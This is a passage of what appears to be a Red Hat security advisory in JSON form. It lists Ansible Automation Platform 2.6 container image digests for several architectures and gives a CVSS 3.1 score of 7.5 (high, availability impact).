"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
